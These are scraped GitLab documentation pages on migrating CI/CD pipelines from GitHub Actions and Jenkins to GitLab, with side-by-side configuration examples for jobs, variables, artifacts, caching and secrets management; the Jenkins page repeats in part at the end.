```

#### Artifacts

In GitLab, any job can use the [artifacts](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs.

For example, in a GitHub Actions `workflow` file:

```yaml
on: [push]
jobs:
  generate_cat:
    steps:
      - run: touch cat.txt
      - run: echo "meow" > cat.txt
      - uses: actions/upload-artifact@v3
        with:
          name: cat
          path: cat.txt
          retention-days: 7

  use_cat:
    needs: [generate_cat]
    steps:
      - uses: actions/download-artifact@v3
        with:
          name: cat
      - run: cat cat.txt
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - generate
  - use

generate_cat:
  stage: generate
  script:
    - touch cat.txt
    - echo "meow" > cat.txt
  artifacts:
    paths:
      - cat.txt
    expire_in: 1 week

use_cat:
  stage: use
  script:
    - cat cat.txt
```

#### Caching

A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching).
For example, in a GitHub Actions `workflow` file:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "This job uses a cache."
      - uses: actions/cache@v3
        with:
          path: binaries/
          key: binaries-cache-${{ github.ref_name }}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
cache-job:
  script:
    - echo "This job uses a cache."
  cache:
    key: binaries-cache-$CI_COMMIT_REF_SLUG
    paths:
      - binaries/
```

#### Templates

In GitHub, an Action is a set of complex tasks that need to be frequently repeated, saved to enable reuse without redefining a CI/CD pipeline. In GitLab, the equivalent to an Action is the [`include` keyword](../yaml/includes.md), which allows you to [add CI/CD pipelines from other files](../yaml/includes.md), including template files built into GitLab.

Sample GitHub Actions configuration:

```yaml
- uses: hashicorp/setup-terraform@v2.0.3
```

The equivalent GitLab CI/CD configuration would be:

```yaml
include:
  - template: Terraform.gitlab-ci.yml
```

In these examples, the `setup-terraform` GitHub action and the `Terraform.gitlab-ci.yml` GitLab template are not exact matches. These two examples are just to show how complex configuration can be reused.

### Security Scanning features

GitLab provides a variety of [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these features to your GitLab CI/CD pipeline by using templates. For example, to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables).

### Secrets Management

Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow.
You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure. You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). 
   - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site.
   - Review the [CI/CD YAML syntax reference](../yaml/_index.md).
1. Set up and configure GitLab.
1. Test your GitLab instance.
   - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners.

### Migration Steps

1. Migrate Projects from GitHub to GitLab:
   - (Recommended) You can use the [GitHub Importer](../../user/project/import/github.md) to automate mass imports from external SCM providers.
   - You can [import repositories by URL](../../user/project/import/repo_by_url.md).
1. Create a `.gitlab-ci.yml` in each project.
1. Migrate GitHub Actions jobs to GitLab CI/CD jobs and configure them to show results directly in merge requests.
1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md).
1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation).
1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient.

### Additional Resources

- [Video: How to migrate from GitHub to GitLab including Actions](https://youtu.be/0Id5oMl1Kqs?feature=shared)
- [Blog: GitHub to GitLab migration the easy way](https://about.gitlab.com/blog/2023/07/11/github-to-gitlab-migration-made-easy/)

If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
url: https://docs.gitlab.com/ci/plan_a_migration
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/plan_a_migration.md
date_extracted: 2025-08-13
root: doc/ci/migration
breadcrumbs: ["doc", "ci", "migration"]
filename: plan_a_migration.md
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Plan a migration from another tool to GitLab CI/CD
description: Migrate from Jenkins, GitHub Actions, and others.
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Before starting a migration from another tool to GitLab CI/CD, you should begin by developing a migration plan. Review [managing organizational changes](#manage-organizational-changes) first for advice on initial steps for larger migrations. Users involved in the migration itself should review the [questions to ask before starting a migration](#technical-questions-to-ask-before-starting-a-migration), as an important technical step for setting expectations.

CI/CD tools differ in approach, structure, and technical specifics. While some concepts map one-to-one, others require iterative conversion. It's important to focus on your desired end state instead of strictly translating the behavior of your old tool.

## Manage organizational changes

An important part of transitioning to GitLab CI/CD is the cultural and organizational changes that come with the move, and successfully managing them. A few things that organizations have reported as helping:

- Set and communicate a clear vision of what your migration goals are, which helps your users understand why the effort is worth it. The value is clear when the work is done, but people need to be aware while it's in progress too.
- Sponsorship and alignment from the relevant leadership teams helps with the previous point.
- Spend time educating your users on what's different, and share this guide with them.
- Finding ways to sequence or delay parts of the migration can help a lot. Importantly though, try not to leave things in a non-migrated (or partially-migrated) state for too long.
- To gain all the benefits of GitLab, moving your existing configuration over as-is, including any current problems, isn't enough. Take advantage of the improvements that GitLab CI/CD offers, and update your implementation as part of the transition.
## Technical questions to ask before starting a migration

Asking some initial technical questions about your CI/CD needs helps quickly define the migration requirements:

- How many projects use this pipeline?
- What branching strategy is used? Feature branches? Mainline? Release branches?
- What tools do you use to build your code? For example, Maven, Gradle, or NPM?
- What tools do you use to test your code? For example, JUnit, Pytest, or Jest?
- Do you use any security scanners?
- Where do you store any built packages?
- How do you deploy your code?
- Where do you deploy your code?

## Related topics

- How to migrate Atlassian Bamboo Server's CI/CD infrastructure to GitLab CI/CD, [part one](https://about.gitlab.com/blog/2022/07/06/migration-from-atlassian-bamboo-server-to-gitlab-ci/) and [part two](https://about.gitlab.com/blog/2022/07/11/how-to-migrate-atlassians-bamboo-servers-ci-cd-infrastructure-to-gitlab-ci-part-two/)
---
url: https://docs.gitlab.com/ci/jenkins
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/jenkins.md
date_extracted: 2025-08-13
root: doc/ci/migration
breadcrumbs: ["doc", "ci", "migration"]
filename: jenkins.md
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from Jenkins
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you're migrating from Jenkins to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your Jenkins workflows.

## Key similarities and differences

GitLab CI/CD and Jenkins are CI/CD tools with some similarities. Both GitLab and Jenkins:

- Use stages for collections of jobs.
- Support container-based builds.

Additionally, there are some important differences between the two:

- GitLab CI/CD pipelines are all configured in a YAML format configuration file. Jenkins uses either a Groovy format configuration file (declarative pipelines) or Jenkins DSL (scripted pipelines).
- GitLab offers [GitLab.com](../../subscriptions/gitlab_com/_index.md), a multi-tenant SaaS service, and [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. You can also run your own [GitLab Self-Managed](../../subscriptions/self_managed/_index.md) instance. Jenkins deployments must be self-hosted.
- GitLab provides source code management (SCM) out of the box. Jenkins requires a separate SCM solution to store code.
- GitLab provides a built-in container registry. Jenkins requires a separate solution for storing container images.
- GitLab provides built-in templates for scanning code. Jenkins requires third-party plugins for scanning code.

## Comparison of features and concepts

Many Jenkins features and concepts have equivalents in GitLab that offer the same functionality.

### Configuration file

Jenkins can be configured with a [`Jenkinsfile` in the Groovy format](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/). GitLab CI/CD uses a `.gitlab-ci.yml` file by default.
Example of a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('hello') {
            steps {
                echo "Hello World"
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - hello

hello-job:
  stage: hello
  script:
    - echo "Hello World"
```

### Jenkins pipeline syntax

A Jenkins configuration is composed of a `pipeline` block with sections and directives. GitLab CI/CD has similar functionality, configured with YAML keywords.

#### Sections

| Jenkins  | GitLab | Explanation |
|----------|--------|-------------|
| `agent`  | `image` | Jenkins pipelines execute on agents, and the `agent` section defines how the pipeline executes, and the Docker container to use. GitLab jobs execute on runners, and the `image` keyword defines the container to use. You can configure your own runners in Kubernetes or on any host. |
| `post`   | `after_script` or `stage` | The Jenkins `post` section defines actions that should be performed at the end of a stage or pipeline. In GitLab, use `after_script` for commands to run at the end of a job, and `before_script` for actions to run before the other commands in a job. Use `stage` to select the exact stage a job should run in. GitLab supports both `.pre` and `.post` stages that always run before or after all other defined stages. |
| `stages` | `stages` | Jenkins stages are groups of jobs. GitLab CI/CD also uses stages, but it is more flexible. You can have multiple stages each with multiple independent jobs. Use `stages` at the top level to define the stages and their execution order, and use `stage` at the job level to define the stage for that job. |
| `steps`  | `script` | Jenkins `steps` define what to execute. GitLab CI/CD uses a `script` section which is similar. The `script` section is a YAML array with separate entries for each command to run in sequence. |
#### Directives

| Jenkins       | GitLab | Explanation |
|---------------|--------|-------------|
| `environment` | `variables` | Jenkins uses `environment` for environment variables. GitLab CI/CD uses the `variables` keyword to define CI/CD variables that can be used during job execution, but also for more dynamic pipeline configuration. These can also be set in the GitLab UI, under CI/CD settings. |
| `options`     | Not applicable | Jenkins uses `options` for additional configuration, including timeouts and retry values. GitLab does not need a separate section for options, all configuration is added as CI/CD keywords at the job or pipeline level, for example `timeout` or `retry`. |
| `parameters`  | Not applicable | In Jenkins, parameters can be required when triggering a pipeline. Parameters are handled in GitLab with CI/CD variables, which can be defined in many places, including the pipeline configuration, project settings, at runtime manually through the UI, or API. |
| `triggers`    | `rules` | In Jenkins, `triggers` defines when a pipeline should run again, for example through cron notation. GitLab CI/CD can run pipelines automatically for many reasons, including Git changes and merge request updates. Use the `rules` keyword to control which events to run jobs for. Scheduled pipelines are defined in the project settings. |
| `tools`       | Not applicable | In Jenkins, `tools` defines additional tools to install in the environment. GitLab does not have a similar keyword, as the recommendation is to use container images prebuilt with the exact tools required for your jobs. These images can be cached and can be built to already contain the tools you need for your pipelines. If a job needs additional tools, they can be installed as part of a `before_script` section. |
| `input`       | Not applicable | In Jenkins, `input` adds a prompt for user input. Similar to `parameters`, inputs are handled in GitLab through CI/CD variables. |
| `when`        | `rules` | In Jenkins, `when` defines when a stage should be executed. GitLab also has a `when` keyword, which defines whether a job should start running based on the status of earlier jobs, for example if jobs passed or failed. To control when to add jobs to specific pipelines, use `rules`. |

### Common configurations

This section goes over commonly used CI/CD configurations, showing how they can be converted from Jenkins to GitLab CI/CD.

[Jenkins pipelines](https://www.jenkins.io/doc/book/pipeline/) generate automated CI/CD jobs that are triggered when certain events take place, such as a new commit being pushed. A Jenkins pipeline is defined in a `Jenkinsfile`. The GitLab equivalent is the [`.gitlab-ci.yml` configuration file](../yaml/_index.md).

Jenkins does not provide a place to store source code, so the `Jenkinsfile` must be stored in a separate source control repository.

#### Jobs

Jobs are a set of commands that run in a set sequence to achieve a particular result. For example, build a container then deploy it to production, in a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('build') {
            agent { docker 'golang:alpine' }
            steps {
                sh 'apk update'
                sh 'go build -o bin/hello'
            }
            post {
                always {
                    archiveArtifacts artifacts: 'bin/hello', onlyIfSuccessful: true
                }
            }
        }
        stage('deploy') {
            agent { docker 'golang:alpine' }
            when {
                branch 'staging'
            }
            steps {
                echo "Deploying to staging"
                sh 'scp bin/hello remoteuser@remotehost:/remote/directory'
            }
        }
    }
}
```

This example:

- Uses the `golang:alpine` container image.
- Runs a job for building code.
- Stores the built executable as an artifact.
- Adds a second job to deploy to `staging`, which:
  - Only exists if the commit targets the `staging` branch.
  - Starts after the build stage succeeds.
  - Uses the built executable artifact from the earlier job.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' artifacts: paths: - bin/hello ``` ##### Parallel In Jenkins, jobs that are not dependent on previous jobs can run in parallel when added to a `parallel` section. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Parallel') { parallel { stage('Python') { agent { docker 'python:latest' } steps { sh "python --version" } } stage('Java') { agent { docker 'openjdk:latest' } when { branch 'staging' } steps { sh "java -version" } } } } } } ``` This example runs a Python and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In GitLab you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. Jenkins runs the matrix sequentially. 
For example, in a `Jenkinsfile`:

```groovy
matrix {
    axes {
        axis {
            name 'PLATFORM'
            values 'linux', 'mac', 'windows'
        }
        axis {
            name 'ARCH'
            values 'x64', 'x86'
        }
    }
    stages {
        stage('build') {
            echo "Building $PLATFORM for $ARCH"
        }
        stage('test') {
            echo "Testing $PLATFORM for $ARCH"
        }
        stage('deploy') {
            echo "Deploying $PLATFORM for $ARCH"
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - build
  - test
  - deploy

.parallel-hidden-job:
  parallel:
    matrix:
      - PLATFORM: [linux, mac, windows]
        ARCH: [x64, x86]

build-job:
  extends: .parallel-hidden-job
  stage: build
  script:
    - echo "Building $PLATFORM for $ARCH"

test-job:
  extends: .parallel-hidden-job
  stage: test
  script:
    - echo "Testing $PLATFORM for $ARCH"

deploy-job:
  extends: .parallel-hidden-job
  stage: deploy
  script:
    - echo "Deploying $PLATFORM for $ARCH"
```

#### Container Images

In GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) using the [image](../yaml/_index.md#image) keyword.

For example, in a `Jenkinsfile`:

```groovy
stage('Version') {
    agent { docker 'python:latest' }
    steps {
        echo 'Hello Python'
        sh 'python --version'
    }
}
```

This example shows commands running in a `python:latest` container.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
version-job:
  image: python:latest
  script:
    - echo "Hello Python"
    - python --version
```

#### Variables

In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job.
For example, in a `Jenkinsfile`: ```groovy pipeline { agent any environment { NAME = 'Fern' } stages { stage('English') { environment { GREETING = 'Hello' } steps { sh 'echo "$GREETING $NAME"' } } stage('Spanish') { environment { GREETING = 'Hola' } steps { sh 'echo "$GREETING $NAME"' } } } } ``` This example shows how variables can be used to pass values to commands in jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` Variables can also be [set in the GitLab UI, in the CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). In some cases, you can use [protected](../variables/_index.md#protect-a-cicd-variable) and [masked](../variables/_index.md#mask-a-cicd-variable) variables for secret values. These variables can be accessed in pipeline jobs the same as variables defined in the configuration file. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Example Username/Password') { environment { AWS_ACCESS_KEY = credentials('aws-access-key') } steps { sh 'my-login-script.sh $AWS_ACCESS_KEY' } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login-job: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, GitLab CI/CD makes [predefined variables](../variables/predefined_variables.md) available to every pipeline and job which contain values relevant to the pipeline and repository. #### Expressions and conditionals When a new pipeline starts, GitLab checks which jobs should run in that pipeline. You can configure jobs to run depending on factors like the status of variables, or the pipeline type. 
For example, in a `Jenkinsfile`:

```groovy
stage('deploy_staging') {
    agent { docker 'alpine:latest' }
    when {
        branch 'staging'
    }
    steps {
        echo "Deploying to staging"
    }
}
```

In this example, the job only runs when the branch we are committing to is named `staging`.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
deploy_staging:
  stage: deploy
  script:
    - echo "Deploy to staging server"
  rules:
    - if: $CI_COMMIT_BRANCH == "staging"
```

#### Runners

Like Jenkins agents, GitLab runners are the hosts that run jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own runners.

To convert a Jenkins agent for use with GitLab CI/CD, uninstall the agent and then [install and register a runner](../runners/_index.md). Runners do not require much overhead, so you might be able to use similar provisioning as the Jenkins agents you were using.

Some key details about runners:

- Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project.
- You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware.
- GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed.
For example, in a `Jenkinsfile`:

```groovy
pipeline {
    agent none
    stages {
        stage('Linux') {
            agent { label 'linux' }
            steps {
                echo "Hello, $USER"
            }
        }
        stage('Windows') {
            agent { label 'windows' }
            steps {
                echo "Hello, %USERNAME%"
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
linux_job:
  stage: build
  tags:
    - linux
  script:
    - echo "Hello, $USER"

windows_job:
  stage: build
  tags:
    - windows
  script:
    - echo "Hello, %USERNAME%"
```

#### Artifacts

In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for example for testing or deployment.

For example, in a `Jenkinsfile`:

```groovy
stages {
    stage('Generate Cat') {
        steps {
            sh 'touch cat.txt'
            sh 'echo "meow" > cat.txt'
        }
        post {
            always {
                archiveArtifacts artifacts: 'cat.txt', onlyIfSuccessful: true
            }
        }
    }
    stage('Use Cat') {
        steps {
            sh 'cat cat.txt'
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - generate
  - use

generate_cat:
  stage: generate
  script:
    - touch cat.txt
    - echo "meow" > cat.txt
  artifacts:
    paths:
      - cat.txt
    expire_in: 1 week

use_cat:
  stage: use
  script:
    - cat cat.txt
  artifacts:
    paths:
      - cat.txt
```

#### Caching

A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). Jenkins core does not provide caching.

For example, in a `.gitlab-ci.yml` file:

```yaml
cache-job:
  script:
    - echo "This job uses a cache."
  cache:
    key: binaries-cache-$CI_COMMIT_REF_SLUG
    paths:
      - binaries/
```

### Jenkins plugins

Some functionality in Jenkins that is enabled through plugins is supported natively in GitLab with keywords and features that offer similar functionality. For example:

| Jenkins plugin | GitLab feature |
|----------------|----------------|
| [Build Timeout](https://plugins.jenkins.io/build-timeout/) | [`timeout` keyword](../yaml/_index.md#timeout) |
| [Cobertura](https://plugins.jenkins.io/cobertura/) | [Coverage report artifacts](../yaml/artifacts_reports.md#artifactsreportscoverage_report) and [Code coverage](../testing/code_coverage/_index.md) |
| [Code coverage API](https://plugins.jenkins.io/code-coverage-api/) | [Code coverage](../testing/code_coverage/_index.md) and [Coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) |
| [Embeddable Build Status](https://plugins.jenkins.io/embeddable-build-status/) | [Pipeline status badges](../../user/project/badges.md#pipeline-status-badges) |
| [JUnit](https://plugins.jenkins.io/junit/) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) |
| [Mailer](https://plugins.jenkins.io/mailer/) | [Notification emails](../../user/profile/notifications.md) |
| [Parameterized Trigger Plugin](https://plugins.jenkins.io/parameterized-trigger/) | [`trigger` keyword](../yaml/_index.md#trigger) and [downstream pipelines](../pipelines/downstream_pipelines.md) |
| [Role-based Authorization Strategy](https://plugins.jenkins.io/role-strategy/) | GitLab [permissions and roles](../../user/permissions.md) |
| [Timestamper](https://plugins.jenkins.io/timestamper/) | [Job](../jobs/_index.md) logs are time stamped by default |

### Security Scanning features

You might have used plugins for things like code quality, security, or static application scanning in Jenkins.
GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these plugins in GitLab using templates, for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. Secrets management in Jenkins is usually handled with the `Secret` type field or the Credentials Plugin. Credentials stored in the Jenkins settings can be exposed to jobs as environment variables by using the Credentials Binding plugin. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Jenkins](https://www.jenkins.io/doc/developer/security/secrets/#storing-secrets). 
You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Jenkins, ask yourself the following questions in preparation: - What plugins are used by jobs in Jenkins today? - Do you know what these plugins do exactly? - Do any plugins wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Jenkins agents? - Are there any shared libraries in use? - How are you authenticating from Jenkins? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Jenkins to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. 
- Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate Jenkins configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. ### Additional Resources - You can use the [JenkinsFile Wrapper](https://gitlab.com/gitlab-org/jfr-container-builder/) to run a complete Jenkins instance inside of a GitLab CI/CD job, including plugins. Use this tool to help ease the transition to GitLab CI/CD, by delaying the migration of less urgent pipelines. {{< alert type="note" >}} The JenkinsFile Wrapper is not packaged with GitLab and falls outside of the scope of support. For more information, see the [Statement of Support](https://about.gitlab.com/support/statement-of-support/). {{< /alert >}} If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from Jenkins
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you're migrating from Jenkins to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your Jenkins workflows.

## Key similarities and differences

GitLab CI/CD and Jenkins are CI/CD tools with some similarities. Both GitLab and Jenkins:

- Use stages for collections of jobs.
- Support container-based builds.

Additionally, there are some important differences between the two:

- GitLab CI/CD pipelines are all configured in a YAML format configuration file. Jenkins uses either a Groovy format configuration file (declarative pipelines) or Jenkins DSL (scripted pipelines).
- GitLab offers [GitLab.com](../../subscriptions/gitlab_com/_index.md), a multi-tenant SaaS service, and [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. You can also run your own [GitLab Self-Managed](../../subscriptions/self_managed/_index.md) instance. Jenkins deployments must be self-hosted.
- GitLab provides source code management (SCM) out of the box. Jenkins requires a separate SCM solution to store code.
- GitLab provides a built-in container registry. Jenkins requires a separate solution for storing container images.
- GitLab provides built-in templates for scanning code. Jenkins requires third-party plugins for scanning code.

## Comparison of features and concepts

Many Jenkins features and concepts have equivalents in GitLab that offer the same functionality.
### Configuration file

Jenkins can be configured with a [`Jenkinsfile` in the Groovy format](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/). GitLab CI/CD uses a `.gitlab-ci.yml` file by default.

Example of a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('hello') {
            steps {
                echo "Hello World"
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - hello

hello-job:
  stage: hello
  script:
    - echo "Hello World"
```

### Jenkins pipeline syntax

A Jenkins configuration is composed of a `pipeline` block with sections and directives. GitLab CI/CD has similar functionality, configured with YAML keywords.

#### Sections

| Jenkins  | GitLab | Explanation |
|----------|----------------|-------------|
| `agent`  | `image` | Jenkins pipelines execute on agents, and the `agent` section defines how the pipeline executes, and the Docker container to use. GitLab jobs execute on runners, and the `image` keyword defines the container to use. You can configure your own runners in Kubernetes or on any host. |
| `post`   | `after_script` or `stage` | The Jenkins `post` section defines actions that should be performed at the end of a stage or pipeline. In GitLab, use `after_script` for commands to run at the end of a job, and `before_script` for actions to run before the other commands in a job. Use `stage` to select the exact stage a job should run in. GitLab supports both `.pre` and `.post` stages that always run before or after all other defined stages. |
